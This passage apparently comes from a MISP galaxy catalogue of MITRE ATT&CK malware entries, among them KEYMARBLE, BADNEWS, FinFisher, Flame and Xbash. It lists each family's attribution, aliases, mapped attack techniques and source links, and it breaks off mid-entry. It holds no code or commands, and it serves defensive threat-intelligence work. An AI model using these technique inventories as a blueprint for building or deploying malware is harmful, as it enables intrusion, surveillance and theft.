[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)

The tag is: misp-galaxy:mitre-malware="KEYMARBLE - S0271"

KEYMARBLE - S0271 is also known as:

KEYMARBLE

View relationships graph

KEYMARBLE - S0271 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4836. Table References
Links
https://attack.mitre.org/software/S0271
https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

SHUTTERSPEED - S0217

[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217"

SHUTTERSPEED - S0217 is also known as:

SHUTTERSPEED

View relationships graph

SHUTTERSPEED - S0217 has relationships with:

similar: misp-galaxy:tool="SHUTTERSPEED" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4837. Table References
Links
https://attack.mitre.org/software/S0217
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Reaver - S0172

[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)

The tag is: misp-galaxy:mitre-malware="Reaver - S0172"

Reaver - S0172 is also known as:

Reaver

View relationships graph

Reaver - S0172 has relationships with:

similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4838. Table References
Links
https://attack.mitre.org/software/S0172
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

BADNEWS - S0128

[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="BADNEWS - S0128"

BADNEWS - S0128 is also known as:

BADNEWS

View relationships graph

BADNEWS - S0128 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4839. Table References
Links
https://attack.mitre.org/software/S0128
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

SLOWDRIFT - S0218

[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SLOWDRIFT - S0218"

SLOWDRIFT - S0218 is also known as:

SLOWDRIFT

View relationships graph

SLOWDRIFT - S0218 has relationships with:

similar: misp-galaxy:tool="SLOWDRIFT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4840. Table References
Links
https://attack.mitre.org/software/S0218
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Dok - S0281

[Dok](https://attack.mitre.org/software/S0281) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user’s network traffic (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)).(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)(Citation: CheckPoint Dok)

The tag is: misp-galaxy:mitre-malware="Dok - S0281"

Dok - S0281 is also known as:

Dok
Retefe

View relationships graph

Dok - S0281 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 4841. Table References
Links
https://attack.mitre.org/software/S0281
https://objective-see.com/blog/blog_0x25.html
http://www.hexed.in/2019/07/osxdok-analysis.html
https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

FinFisher - S0182

[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)

The tag is: misp-galaxy:mitre-malware="FinFisher - S0182"

FinFisher - S0182 is also known as:

FinFisher
FinSpy

View relationships graph

FinFisher - S0182 has relationships with:

similar: misp-galaxy:malpedia="FinFisher RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 4842. Table References
Links
https://attack.mitre.org/software/S0182
http://www.finfisher.com/FinFisher/index.html
http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf
https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html
https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

WINERACK - S0219

[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="WINERACK - S0219"

WINERACK - S0219 is also known as:

WINERACK

View relationships graph

WINERACK - S0219 has relationships with:

similar: misp-galaxy:tool="WINERACK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 4843. Table References
Links
https://attack.mitre.org/software/S0219
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

PJApps - S0291

[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="PJApps - S0291"

PJApps - S0291 is also known as:

PJApps

View relationships graph

PJApps - S0291 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"

Table 4844. Table References
Links
https://attack.mitre.org/software/S0291
https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

RuMMS - S0313

[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)

The tag is: misp-galaxy:mitre-malware="RuMMS - S0313"

RuMMS - S0313 is also known as:

RuMMS

View relationships graph

RuMMS - S0313 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4845. Table References
Links
https://attack.mitre.org/software/S0313
https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html

HotCroissant - S0431

[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="HotCroissant - S0431"

HotCroissant - S0431 is also known as:

HotCroissant

View relationships graph

HotCroissant - S0431 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4846. Table References
Links
https://attack.mitre.org/software/S0431
https://www.us-cert.gov/ncas/analysis-reports/ar20-045d
https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

Downdelph - S0134

[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)

The tag is: misp-galaxy:mitre-malware="Downdelph - S0134"

Downdelph - S0134 is also known as:

Downdelph
Delphacy

View relationships graph

Downdelph - S0134 has relationships with:

similar: misp-galaxy:tool="Downdelph" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Downdelph" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4847. Table References
Links
https://attack.mitre.org/software/S0134
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

Flame - S0143

Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)

The tag is: misp-galaxy:mitre-malware="Flame - S0143"

Flame - S0143 is also known as:

Flame
Flamer
sKyWIper

View relationships graph

Flame - S0143 has relationships with:

similar: misp-galaxy:tool="Flame" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002" with estimative-language:likelihood-probability="almost-certain"

Table 4848. Table References
Links
https://attack.mitre.org/software/S0143
https://securelist.com/the-flame-questions-and-answers-51/34344/
https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache
https://www.crysys.hu/publications/files/skywiper.pdf

Xbash - S0341

[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)

The tag is: misp-galaxy:mitre-malware="Xbash - S0341"

Xbash - S0341 is also known as:

Xbash

View relationships graph

Xbash - S0341 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 4849. Table References
Links
https://attack.mitre.org/software/S0341
https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

Final1stspy - S0355

[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="Final1stspy - S0355"

Final1stspy - S0355 is also known as:

Final1stspy

View relationships graph

Final1stspy - S0355 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4850. Table References
Links
https://attack.mitre.org/software/S0355
https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

Cannon - S0351

[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)

The tag is: misp-galaxy:mitre-malware="Cannon - S0351"

Cannon - S0351 is also known as:

Cannon

View relationships graph

Cannon - S0351 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
